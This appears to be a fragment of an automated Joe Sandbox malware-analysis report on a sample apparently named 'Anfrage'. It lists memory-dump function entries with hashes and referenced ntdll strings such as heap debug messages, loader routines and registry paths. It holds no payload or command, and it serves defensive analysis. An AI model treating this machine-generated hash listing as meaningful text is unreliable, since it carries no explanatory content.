                                                                          • Opcode ID: 4201e3ffd0b941c0ff18c55633a8348b25a6e6697681b81aaec20c866641b700
                                                                          • Instruction ID: fd43ef7d201a11bbdd46fae796439debbff048d243c68293402421281d136545
                                                                          • Opcode Fuzzy Hash: 4201e3ffd0b941c0ff18c55633a8348b25a6e6697681b81aaec20c866641b700
                                                                          • Instruction Fuzzy Hash: 0C51EDB5E10615EFFB05DF68C898BADBBB9BF84355F204069E90193290DB709905CB81
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 0fe1fc45694aae947b57daf38126dbeffe33aaf974456d41878f09eb305769f3
                                                                          • Instruction ID: 9f886b3ce1d7d2821bc371007a5b3bb98c33e58afb57a86fe5c8e0dc5db6dde7
                                                                          • Opcode Fuzzy Hash: 0fe1fc45694aae947b57daf38126dbeffe33aaf974456d41878f09eb305769f3
                                                                          • Instruction Fuzzy Hash: 21517875E40A16AFEB06CF64CC84B9ABBB6FF4A314F144065E90597790EB30AD21CB90
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 03a152981a6365d59fef779dabfadc186f70ad18636ced90e1741dc0f93e6924
                                                                          • Instruction ID: cfaf87f9e1b609859da759a2553cfbaec1398d9ce9d0ce93764c7b96492c4a32
                                                                          • Opcode Fuzzy Hash: 03a152981a6365d59fef779dabfadc186f70ad18636ced90e1741dc0f93e6924
                                                                          • Instruction Fuzzy Hash: D031F2B5E0021A8FDB04CFAAC988ADDFBB6BF49354F15812AE851B3250DB349941CF60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                          • API String ID: 0-3178619729
                                                                          • Opcode ID: 843afc4af2f0a5d988972c3608654cc5d2a8e3276434bb8ef2e8cf36b70d66c9
                                                                          • Instruction ID: d5c9a7ea25bc30b59df4b20fd8f797241817dddb396624bff08857ddd4b29cdb
                                                                          • Opcode Fuzzy Hash: 843afc4af2f0a5d988972c3608654cc5d2a8e3276434bb8ef2e8cf36b70d66c9
                                                                          • Instruction Fuzzy Hash: 6F220FB4E003459FEB06CF25C890B6ABBF5FF05744F248499E9858B781DB35E886CB91
                                                                          Strings
                                                                          • HEAP: , xrefs: 363C1596
                                                                          • HEAP[%wZ]: , xrefs: 363C1712
                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 363C1728
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                          • API String ID: 0-3178619729
                                                                          • Opcode ID: 37b792013ed53cccbef8913b22547ecf8438a724b4c31bc62c204efce1a9d011
                                                                          • Instruction ID: 3c3eefd5a64023855dd2c34fc1081764c9561aad5ce5f7e5b98c41fbafc35ba5
                                                                          • Opcode Fuzzy Hash: 37b792013ed53cccbef8913b22547ecf8438a724b4c31bc62c204efce1a9d011
                                                                          • Instruction Fuzzy Hash: EEE12074E047559FEB15CF28C890BBABBF5AF48304F14845EF8968B246DB34E845EB90
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                          • API String ID: 0-2391371766
                                                                          • Opcode ID: 14661ea4d236dc23a44084c9958f30610a9b496c9f38f47c056ca84802c8abb9
                                                                          • Instruction ID: 1402a22d90d0f2552965c854607b15dc7710b524493af6e8353f46678726b077
                                                                          • Opcode Fuzzy Hash: 14661ea4d236dc23a44084c9958f30610a9b496c9f38f47c056ca84802c8abb9
                                                                          • Instruction Fuzzy Hash: 83B19F71E44351AFF713EF56CC81B57B7E8AB45B54F804829FA80A7280E775E804CB92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                          • API String ID: 0-318774311
                                                                          • Opcode ID: 7aa0fd78e77ab49760deba0274e6ba814012226d7ed10faa71ad483f1610eedf
                                                                          • Instruction ID: 635464f76f79cd1dbaa79eef4c19b27f39e55286e53c21f071c2c3d18c5dfcfc
                                                                          • Opcode Fuzzy Hash: 7aa0fd78e77ab49760deba0274e6ba814012226d7ed10faa71ad483f1610eedf
                                                                          • Instruction Fuzzy Hash: 70815AB5E08350AFE3129F15C880B6AB7E8EF85754F41496DFA9097390FB74D904CBA2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                          • API String ID: 0-3870751728
                                                                          • Opcode ID: ee54c18ce96e7d72d54074a32c5ab2d992e6eea949db1b9e1fcd608cc040c842
                                                                          • Instruction ID: 88a566965a349874d542bb18e808c735cbece7611089f989b81dd5ac28ec4144
                                                                          • Opcode Fuzzy Hash: ee54c18ce96e7d72d54074a32c5ab2d992e6eea949db1b9e1fcd608cc040c842
                                                                          • Instruction Fuzzy Hash: C79159B4E002159FEB15DF69C985BADBBF1BF48314F24C16AD904AB391EB359802CF94
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %$&$@
                                                                          • API String ID: 0-1537733988
                                                                          • Opcode ID: f41ada9249caefd69d4ad168689d6d9671d17e00e84c4c3054012ff4c987959f
                                                                          • Instruction ID: 870637bb944c54aff00bfdd7ad25433bd1dae226a7d1300544dddb50af497670
                                                                          • Opcode Fuzzy Hash: f41ada9249caefd69d4ad168689d6d9671d17e00e84c4c3054012ff4c987959f
                                                                          • Instruction Fuzzy Hash: 2C71C4749293059FE705CF15C980A4BB7E9FF89758F20492DE4994B290DB32D909CB93
                                                                          Strings
                                                                          • TargetNtPath, xrefs: 3649B82F
                                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3649B82A
                                                                          • GlobalizationUserSettings, xrefs: 3649B834
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                          • API String ID: 0-505981995
                                                                          • Opcode ID: 3bd8f1be0f6bb94396227840296986e0cb76ffaa50e94f704834bdd47113b2b9
                                                                          • Instruction ID: ba59b958e90f2631b4c085b0d44c55b673815912bcb3f451134a380ad8f43882
                                                                          • Opcode Fuzzy Hash: 3bd8f1be0f6bb94396227840296986e0cb76ffaa50e94f704834bdd47113b2b9
                                                                          • Instruction Fuzzy Hash: 0B615A72D51229AFDB21DF55DC88BDABBF8AF14750F4101E9E908A7250CB349E84CF91
                                                                          Strings
                                                                          • HEAP: , xrefs: 3641E6B3
                                                                          • HEAP[%wZ]: , xrefs: 3641E6A6
                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3641E6C6
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                          • API String ID: 0-1340214556
                                                                          • Opcode ID: 93d08e8078ae26d42d302042505f60b83242f4d85a082544a0d99772fe720d97
                                                                          • Instruction ID: 1fd746922bcaf73fd8de02b641caa3bb004bb8407767b45b68bd87060295fe69
                                                                          • Opcode Fuzzy Hash: 93d08e8078ae26d42d302042505f60b83242f4d85a082544a0d99772fe720d97
                                                                          • Instruction Fuzzy Hash: 6E51E179A04744EFF712CFA5C984B9ABBF8EF05344F0450A8E590CBA92D734E941CB51
                                                                          Strings
                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 3642A59A
                                                                          • LdrpCompleteMapModule, xrefs: 3642A590
                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3642A589
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                          • API String ID: 0-1676968949
                                                                          • Opcode ID: cb2fd6833e1cc28bdbcf5dc29af10733936f252bc2a1b1ecfa5ac39c47cd41c3
                                                                          • Instruction ID: 801fc8273dd4f6b1d584dbc224c73bcdc10ad06a2666a9ea0db0e6a559b663b4
                                                                          • Opcode Fuzzy Hash: cb2fd6833e1cc28bdbcf5dc29af10733936f252bc2a1b1ecfa5ac39c47cd41c3
                                                                          • Instruction Fuzzy Hash: B451F17AA007549FFB12CF59CD80B06BBE8AF00758F640594ED509B6D1DBB4E981CB51
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                          • API String ID: 0-1151232445
                                                                          • Opcode ID: 82b382b6fa0683b51ea6d53a27637fb509e09f413417aa69fa6ee64f885459d9
                                                                          • Instruction ID: 385bf8c02db5e0b0ea3952b501664da471ec24fae29e8f1539f13517b8f2738a
                                                                          • Opcode Fuzzy Hash: 82b382b6fa0683b51ea6d53a27637fb509e09f413417aa69fa6ee64f885459d9
                                                                          • Instruction Fuzzy Hash: C441E3B8F503408FFF16CF1AC4847A977B2DF01384F644469D5958BB46DAB4D88ACB52
                                                                          Strings
                                                                          • LdrpAllocateTls, xrefs: 36431B40
                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 36431B4A
                                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36431B39
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                          • API String ID: 0-4274184382
                                                                          • Opcode ID: 391126d1d916311c0c23263cae27d25757c50ddcf9f1ba5a8fca6d3b84e112d1
                                                                          • Instruction ID: a5a45f7c132b2fe6afbd2845d51cd8991d13e259a79a74881c1e4eba4d547a26
                                                                          • Opcode Fuzzy Hash: 391126d1d916311c0c23263cae27d25757c50ddcf9f1ba5a8fca6d3b84e112d1
                                                                          • Instruction Fuzzy Hash: 7E418AB5E01604AFDB15CFA9DD81BAEBBF6FF48314F108119E405AB200EB75A815CF91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-964947082
                                                                          • Opcode ID: 76b0359df4266783dcd8d95b996e25e1d5ebb04cdda7fb90f2fad660e14807f9
                                                                          • Instruction ID: 4132aa493e7ee5a5bc338d1191a2c86f12a4b5be1d3c93e8fd5d46a24c1dce8e
                                                                          • Opcode Fuzzy Hash: 76b0359df4266783dcd8d95b996e25e1d5ebb04cdda7fb90f2fad660e14807f9
                                                                          • Instruction Fuzzy Hash: 2A41C2B5E01354AFDB16CF66D880FEA7BA9EF04314F504069EAA1AF240DE30D855CF91
                                                                          Strings
                                                                          • SXS: %s() passed the empty activation context data, xrefs: 364329FE
                                                                          • RtlCreateActivationContext, xrefs: 364329F9
                                                                          • Actx , xrefs: 363F33AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                          • API String ID: 0-859632880
                                                                          • Opcode ID: 4e87f0139ea591debfb007e5ebcc9deecdc97d742853166abcecb0ad4007821a
                                                                          • Instruction ID: 8e005f64db47997dff16f0dae708b21b3b941e69d6a116a7a629a25201f5323e
                                                                          • Opcode Fuzzy Hash: 4e87f0139ea591debfb007e5ebcc9deecdc97d742853166abcecb0ad4007821a
                                                                          • Instruction Fuzzy Hash: 44312F32A213119FFB12DE69D880B9A37A8FF48760F214469ED049F381CB32E855CBD1
                                                                          Strings
                                                                          • @, xrefs: 3644B670
                                                                          • GlobalFlag, xrefs: 3644B68F
                                                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3644B632
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                          • API String ID: 0-4192008846
                                                                          • Opcode ID: 265ce49c8315bb758f01cc2d4c7667e96a31bd33aa646bfefbca339e1c38d5a3
                                                                          • Instruction ID: b9b6b0e50f69cb7bddcc8eb225f87e99eec0137ddef05be6ddef4cf6047c76ec
                                                                          • Opcode Fuzzy Hash: 265ce49c8315bb758f01cc2d4c7667e96a31bd33aa646bfefbca339e1c38d5a3
                                                                          • Instruction Fuzzy Hash: 38315DB5E00219AFEB02EFA5DC81AEFBBB8EF44744F500469E605A7250D774DE04CBA5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                                          • API String ID: 0-1050206962
                                                                          • Opcode ID: 0602c69080c3208885b9cf0d113d2f28135f272bcc4e898927fe6df94763b6ab
                                                                          • Instruction ID: 4a28afa00fb5553b258b1c9c7549f2ad8ecab6f5aeaa4d866bf40835edd6cfc8
                                                                          • Opcode Fuzzy Hash: 0602c69080c3208885b9cf0d113d2f28135f272bcc4e898927fe6df94763b6ab
                                                                          • Instruction Fuzzy Hash: 75318EB2D00229AFEB02DF95CC84EAEBBBDEB44658F410479E900A7210D778DD048BA1
                                                                          Strings
                                                                          • LdrpInitializeTls, xrefs: 36431A47
                                                                          • DLL "%wZ" has TLS information at %p, xrefs: 36431A40
                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 36431A51
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                          • API String ID: 0-931879808
                                                                          • Opcode ID: f577fa088aaa688921788fd9f21f146916817fbcad7240f11db5da2f4aeb9bfd
                                                                          • Instruction ID: 5ae9dd523366b76e35729a3b5a040c7173de55c900250e6dab85e7d00ae0ee24
                                                                          • Opcode Fuzzy Hash: f577fa088aaa688921788fd9f21f146916817fbcad7240f11db5da2f4aeb9bfd
                                                                          • Instruction Fuzzy Hash: 5D31EF32E20200ABFB15DF48DC81F6ABABEEB54358F140119FA40BF280DB71AD4587A1
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: RtlValidateHeap
                                                                          • API String ID: 3446177414-1797218451
                                                                          • Opcode ID: 8ddb41bbab6103c67abf4e949feeae4a603c40ac672bd1ebcaa448158c00db48
                                                                          • Instruction ID: 8c07243fd95a80ba11019195924a4e5fe854562947b1853647d6e7a5f24d2d5e
                                                                          • Opcode Fuzzy Hash: 8ddb41bbab6103c67abf4e949feeae4a603c40ac672bd1ebcaa448158c00db48
                                                                          • Instruction Fuzzy Hash: 81412276E403559FEF02CF64C8947AEBBB6FF41314F048259D4516B780CB349A45CB95
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: kLsE
                                                                          • API String ID: 3446177414-3058123920
                                                                          • Opcode ID: 57d782ea0b11b72cdea52a9ed90722abf948a5eebfd81c683bc5235f89169322
                                                                          • Instruction ID: 17d77341eef572a22a0e241597484bebfdedaa5dd9379b011470773c8b3e1aab
                                                                          • Opcode Fuzzy Hash: 57d782ea0b11b72cdea52a9ed90722abf948a5eebfd81c683bc5235f89169322
                                                                          • Instruction Fuzzy Hash: DD413772D0134087EB12DF66DD88BA53F95AB01768F200119EED06B2C5CB754893C7B2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@
                                                                          • API String ID: 0-149943524
                                                                          • Opcode ID: 972b809a6a847ceb870da5af72ac7627471bfa95c5a85d32d59a80b1917864d1
                                                                          • Instruction ID: 4232d3370d8290fa4e9b088dd74765575f85516f06a5bfdbd48c5c7fc24ad6a1
                                                                          • Opcode Fuzzy Hash: 972b809a6a847ceb870da5af72ac7627471bfa95c5a85d32d59a80b1917864d1
                                                                          • Instruction Fuzzy Hash: BB32AEBA9083618FE714CF16C88073EB7E5EF847A4F60492EF99597290E734C954CB92
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 18d2aa2c71243b5221a63a07238d0965a0d7578fc300c6b137a2ec35966918ce
                                                                          • Instruction ID: 6ed708d63c085595cc2660fc2c6916ba43bb308a5f8b15bfa1cb6920cf6bf560
                                                                          • Opcode Fuzzy Hash: 18d2aa2c71243b5221a63a07238d0965a0d7578fc300c6b137a2ec35966918ce
